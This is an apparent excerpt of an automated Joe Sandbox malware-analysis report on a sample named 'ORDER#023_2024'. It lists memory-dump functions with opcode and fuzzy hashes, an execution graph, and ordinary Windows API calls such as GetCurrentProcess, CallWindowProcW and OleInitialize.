                                                                                            Function 06F55FCB Relevance: .1, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9df1f6ee49d83907c4c97c35eaa175b9f1670cef71b54ee4d50941bdd25f088a
                                                                                            • Instruction ID: 5f10d0237461cca8e74d314b4d98a89470b184ed03e8a119616868cbd108e8dd
                                                                                            • Opcode Fuzzy Hash: 9df1f6ee49d83907c4c97c35eaa175b9f1670cef71b54ee4d50941bdd25f088a
                                                                                            • Instruction Fuzzy Hash: 6A510874E002198FDB14CFA9C9815AEFBF2BF89304F249169D918A7356DB31AD41CFA1
                                                                                            Function 06F584EE Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2d065617f7d9678f56995e680891188d299f3260501220fa3ec8e88f510c0a4e
                                                                                            • Instruction ID: 05595ad16f65f7c0b98d75c69b2686bc74df68d6fdd45aa449c57cb2f3acb7a2
                                                                                            • Opcode Fuzzy Hash: 2d065617f7d9678f56995e680891188d299f3260501220fa3ec8e88f510c0a4e
                                                                                            • Instruction Fuzzy Hash: 3BF03C36859168CFCB90CF94D4482FCBBF8EB5B392F0220A7991EA6211CB344D84CF40
                                                                                            Function 06F58579 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 45244828898cd6b10dc85763c628ea0a1af38e32ba312386e0d2387ed62536d8
                                                                                            • Instruction ID: 0381481ebbf2ee1d61e85b5551c3e3d03651f213cd3f67113396c1f041109aad
                                                                                            • Opcode Fuzzy Hash: 45244828898cd6b10dc85763c628ea0a1af38e32ba312386e0d2387ed62536d8
                                                                                            • Instruction Fuzzy Hash: AEE0923AD1D264DFC7909FA8E4481F4FBB9EB0B346F0120E79A1DAB112D2304D008F95
                                                                                            Function 06F586B6 Relevance: .0, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9c3766a0ca5fc984431d2530e1e93ffba98831fe704bc999fdd410e653377a5b
                                                                                            • Instruction ID: c84ee6c146f2a39772a77f8d16b24223e6e845aa18160a79660208aa964cd031
                                                                                            • Opcode Fuzzy Hash: 9c3766a0ca5fc984431d2530e1e93ffba98831fe704bc999fdd410e653377a5b
                                                                                            • Instruction Fuzzy Hash: B7C01227E89020DED7400984A4040F8F7BEDB57192B0630B38F1E92112915189154698

                                                                                            Execution Graph

                                                                                            Execution Coverage:8.8%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:73
                                                                                            Total number of Limit Nodes:9
                                                                                            execution_graph 33474 14cbfc8 DuplicateHandle 33475 14cc05e 33474->33475 33476 14c8fa8 33477 14c8fad 33476->33477 33478 14c8fcb 33477->33478 33480 14c9500 33477->33480 33481 14c950a 33480->33481 33482 14c952a 33481->33482 33485 6842f38 33481->33485 33489 6842f48 33481->33489 33482->33477 33486 6842f5d 33485->33486 33487 68431a8 33486->33487 33488 68435c8 GlobalMemoryStatusEx 33486->33488 33487->33482 33488->33486 33490 6842f5d 33489->33490 33491 68431a8 33490->33491 33492 68435c8 GlobalMemoryStatusEx 33490->33492 33491->33482 33492->33490 33506 14cbc98 33507 14cbc9a GetCurrentProcess 33506->33507 33509 14cbd29 33507->33509 33510 14cbd30 GetCurrentThread 33507->33510 33509->33510 33511 14cbd6d GetCurrentProcess 33510->33511 33512 14cbd66 33510->33512 33513 14cbda3 33511->33513 33512->33511 33514 14cbdcb GetCurrentThreadId 33513->33514 33515 14cbdfc 33514->33515 33516 147d01c 33517 147d034 33516->33517 33518 147d08e 33517->33518 33521 67f0938 33517->33521 33529 67f0948 33517->33529 33522 67f0946 33521->33522 33524 67f09a7 33521->33524 33523 67f09a9 33522->33523 33526 67f0999 33522->33526 33547 67f05bc 33523->33547 33537 67f0ac1 33526->33537 33542 67f0ad0 33526->33542 33532 67f0975 33529->33532 33530 67f09a9 33531 67f05bc CallWindowProcW 33530->33531 33533 67f09a7 33531->33533 33532->33530 33534 67f0999 33532->33534 33535 67f0ac1 CallWindowProcW 33534->33535 33536 67f0ad0 CallWindowProcW 33534->33536 33535->33533 33536->33533 33538 67f0ad0 33537->33538 33551 67f0b79 33538->33551 33555 67f0b88 33538->33555 33539 67f0b70 33539->33524 33544 67f0ae4 33542->33544 33543 67f0b70 33543->33524 33545 67f0b79 CallWindowProcW 33544->33545 33546 67f0b88 CallWindowProcW 33544->33546 33545->33543 33546->33543 33548 67f05c7 33547->33548 33549 67f220a CallWindowProcW 33548->33549 33550 67f21b9 33548->33550 33549->33550 33550->33524 33552 67f0b88 33551->33552 33553 67f0b99 33552->33553 33558 67f2150 33552->33558 33553->33539 33556 67f0b99 33555->33556 33557 67f2150 CallWindowProcW 33555->33557 33556->33539 33557->33556 33559 67f05bc CallWindowProcW 33558->33559 33560 67f215a 33559->33560 33560->33553 33493 67f50f0 33494 67f53f8 33493->33494 33495 67f5118 33493->33495 33496 67f5121 33495->33496 33499 67f433c 33495->33499 33498 67f5144 33500 67f4347 33499->33500 33501 67f543b 33500->33501 33503 67f4358 33500->33503 33501->33498 33504 67f5470 OleInitialize 33503->33504 33505 67f54d4 33504->33505 33505->33501

                                                                                            Executed Functions

                                                                                            Function 014CBC88 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 895 14cbc88-14cbc96 call 14cc24f 899 14cbc98-14cbc99 895->899 900 14cbc9a-14cbd27 GetCurrentProcess 895->900 899->900 904 14cbd29-14cbd2f 900->904 905 14cbd30-14cbd64 GetCurrentThread 900->905 904->905 906 14cbd6d-14cbda1 GetCurrentProcess 905->906 907 14cbd66-14cbd6c 905->907 909 14cbdaa-14cbdc5 call 14cbebf 906->909 910 14cbda3-14cbda9 906->910 907->906 912 14cbdcb-14cbdfa GetCurrentThreadId 909->912 910->909 914 14cbdfc-14cbe02 912->914 915 14cbe03-14cbe65 912->915 914->915
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014CBD16
                                                                                            • GetCurrentThread.KERNEL32 ref: 014CBD53
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014CBD90
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 014CBDE9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904709160.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_14c0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: d5f7b43685ff2a1091d9e97a514c24dde15544bf6dfaeb2ab288ff4b08693715
                                                                                            • Instruction ID: c6218ed54194aca57f3354b1cccbc2538e8a6daee8735389cc437a309ba82981
                                                                                            • Opcode Fuzzy Hash: d5f7b43685ff2a1091d9e97a514c24dde15544bf6dfaeb2ab288ff4b08693715
                                                                                            • Instruction Fuzzy Hash: 125176B49003498FDB44DFAAD548B9EBFF5EF48314F20846EE019A73A0DB355884CB66
                                                                                            Function 014CBC98 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 922 14cbc98-14cbd27 GetCurrentProcess 927 14cbd29-14cbd2f 922->927 928 14cbd30-14cbd64 GetCurrentThread 922->928 927->928 929 14cbd6d-14cbda1 GetCurrentProcess 928->929 930 14cbd66-14cbd6c 928->930 932 14cbdaa-14cbdc5 call 14cbebf 929->932 933 14cbda3-14cbda9 929->933 930->929 935 14cbdcb-14cbdfa GetCurrentThreadId 932->935 933->932 937 14cbdfc-14cbe02 935->937 938 14cbe03-14cbe65 935->938 937->938
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014CBD16
                                                                                            • GetCurrentThread.KERNEL32 ref: 014CBD53
                                                                                            • GetCurrentProcess.KERNEL32 ref: 014CBD90
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 014CBDE9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904709160.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_14c0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Current$ProcessThread
                                                                                            • String ID:
                                                                                            • API String ID: 2063062207-0
                                                                                            • Opcode ID: d24b888ebfc74180bdeffe9e601fcab9bbcead977ad743175ce22414a45d35c6
                                                                                            • Instruction ID: 780c776578acdc384bfc542aee8a8fc59e1ac8617f459d5458478b3a00dd98d4
                                                                                            • Opcode Fuzzy Hash: d24b888ebfc74180bdeffe9e601fcab9bbcead977ad743175ce22414a45d35c6
                                                                                            • Instruction Fuzzy Hash: A05156B49002498FDB54CFAAD548B9EBFF5EF48314F20846DE009A7360DB35A984CF66
                                                                                            Function 06843DA0 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2908556333.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_6840000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a55cd402163ec8b605c7afcb6a3ef590573a95f7b9710a47fed6ac7ce80a12f2
                                                                                            • Instruction ID: 7e56a80a44e091f0235c3637b01841382ffe45f9e7657063e0b2bfc6054097fe
                                                                                            • Opcode Fuzzy Hash: a55cd402163ec8b605c7afcb6a3ef590573a95f7b9710a47fed6ac7ce80a12f2
                                                                                            • Instruction Fuzzy Hash: 36413631D047998FC715DF6AD81039EBFF0AF89310F14856ED494D7281E7789841CB91
                                                                                            Function 067F05BC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 067F2231
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2908313317.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_67f0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallProcWindow
                                                                                            • String ID:
                                                                                            • API String ID: 2714655100-0
                                                                                            • Opcode ID: b02a67db7740ff99bc03e4eb8934ac049403cf9364f3387a00d82c6facc59413
                                                                                            • Instruction ID: 00c574ae92bdfefd74f8a8af21eab84d8da26916649fa8ba6e117252acdb674b
                                                                                            • Opcode Fuzzy Hash: b02a67db7740ff99bc03e4eb8934ac049403cf9364f3387a00d82c6facc59413
                                                                                            • Instruction Fuzzy Hash: 62415AB4910309CFCB54CF99C848EAABBF5FB88314F25C459D629AB321C335A945CFA0
                                                                                            Function 014CBFC0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014CC04F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904709160.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_14c0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 8b26dfaecfcd67645775cf8dc6d5c06ca173fa445a3a338dd5ecdf79e974a164
                                                                                            • Instruction ID: da4224b86915ca614908ea28203eed73e1e71b40197557babd0623cbc48b80a2
                                                                                            • Opcode Fuzzy Hash: 8b26dfaecfcd67645775cf8dc6d5c06ca173fa445a3a338dd5ecdf79e974a164
                                                                                            • Instruction Fuzzy Hash: 5321E3B59002089FDB10CF9AD584ADEFFF5FB48310F14801AE958A7310D379A944CFA4
                                                                                            Function 014CBFC8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014CC04F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904709160.00000000014C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_14c0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 98ca7e276ee4dcb055b1a8a202fd885ac9167840f103fa4d04df4af406008af7
                                                                                            • Instruction ID: 0d93e7fa8bc2ea21f9ce6c0f123c6170ababf304e114ba5d3fc115ddbbe3fa80
                                                                                            • Opcode Fuzzy Hash: 98ca7e276ee4dcb055b1a8a202fd885ac9167840f103fa4d04df4af406008af7
                                                                                            • Instruction Fuzzy Hash: D921E4B59002089FDB10CF9AD584ADEBFF4EB48310F14801AE918A3310D379A940CFA4
                                                                                            Function 06843E88 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 06843EEF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2908556333.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_6840000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: GlobalMemoryStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1890195054-0
                                                                                            • Opcode ID: 610ff2bd92efb06f24c58356ae8fe35696f55b06828a6f3fad26c81b9fff056b
                                                                                            • Instruction ID: cb5661fd0d75b5208a12df8cb0f608a762eb5911494f6d5bde3b5e304ef17a79
                                                                                            • Opcode Fuzzy Hash: 610ff2bd92efb06f24c58356ae8fe35696f55b06828a6f3fad26c81b9fff056b
                                                                                            • Instruction Fuzzy Hash: 5011F0B1C006699BCB10DF9AC544BDEFBF4EF48324F15816AE918A7250D378A944CFA5
                                                                                            Function 067F546B Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 067F54C5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2908313317.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_67f0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize
                                                                                            • String ID:
                                                                                            • API String ID: 2538663250-0
                                                                                            • Opcode ID: f38b065604971770e52d9ff632892888dec8808f710877d4617c72698564c3f2
                                                                                            • Instruction ID: 5045f920f3e4a59f21330ba310ec71490494501e5f965f14df190d6d75ab31bf
                                                                                            • Opcode Fuzzy Hash: f38b065604971770e52d9ff632892888dec8808f710877d4617c72698564c3f2
                                                                                            • Instruction Fuzzy Hash: B41115B58003488FDB20DF9AD848BDEBFF8EB48324F208419D558A7710C379A544CFA5
                                                                                            Function 067F4358 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 067F54C5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2908313317.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_67f0000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize
                                                                                            • String ID:
                                                                                            • API String ID: 2538663250-0
                                                                                            • Opcode ID: 6da859ba4821e83a74336b58846b951de0c396f372e76c30e36bc1e931065840
                                                                                            • Instruction ID: f1faaf92c40a43232596140ce5ddfaaf4e227c6061f9f6fe02a4ef1b10a76ddf
                                                                                            • Opcode Fuzzy Hash: 6da859ba4821e83a74336b58846b951de0c396f372e76c30e36bc1e931065840
                                                                                            • Instruction Fuzzy Hash: E51142B08003488FDB20DFAAD448BEEBFF4EB48324F208419D618A7710C378A944CFA5
                                                                                            Function 0147D01C Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904504962.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_147d000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aacb61806b1f1a46ad4312b4198dec8e521bf6c7ce9860aca8f36eb4a3573d49
                                                                                            • Instruction ID: 305fad05e8d2f510605d004ce62b7cc197801c666c653d48cb3e873a3b3983c0
                                                                                            • Opcode Fuzzy Hash: aacb61806b1f1a46ad4312b4198dec8e521bf6c7ce9860aca8f36eb4a3573d49
                                                                                            • Instruction Fuzzy Hash: 852125B1904280DFCB16DF58D984B56BFA5EF84318F20C56ED90A4B366C336D447CA61
                                                                                            Function 0147D006 Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904504962.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_147d000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b96c3d8d28fe2b6f5c3fafba7cec694e4447a0cab58f64c060e179e99aec9a10
                                                                                            • Instruction ID: 5bdf06acd6d7ee79e886642930ae8d0e3cd07070ecdd6f493181d98ef05e3b62
                                                                                            • Opcode Fuzzy Hash: b96c3d8d28fe2b6f5c3fafba7cec694e4447a0cab58f64c060e179e99aec9a10
                                                                                            • Instruction Fuzzy Hash: C3216D755093C08FDB03CF24D994756BF71EF46218F28C5DAD8498B6A7C33A980ACB62
                                                                                            Function 0146D628 Relevance: .0, Instructions: 36COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2904456411.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_146d000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3743913100df404586cb5764e17740b1df7926d9fa332f23c6d8cd2d4b999fb4
                                                                                            • Instruction ID: 0e5201b8e74f31f521f224bedd376cecef0ebb8db122db8ed86dabed1e17cf14
                                                                                            • Opcode Fuzzy Hash: 3743913100df404586cb5764e17740b1df7926d9fa332f23c6d8cd2d4b999fb4
                                                                                            • Instruction Fuzzy Hash: 11F062715083449EEB118A1AD8C4B63FFACEF41628F18C45BED4C4E296C2799844CAB2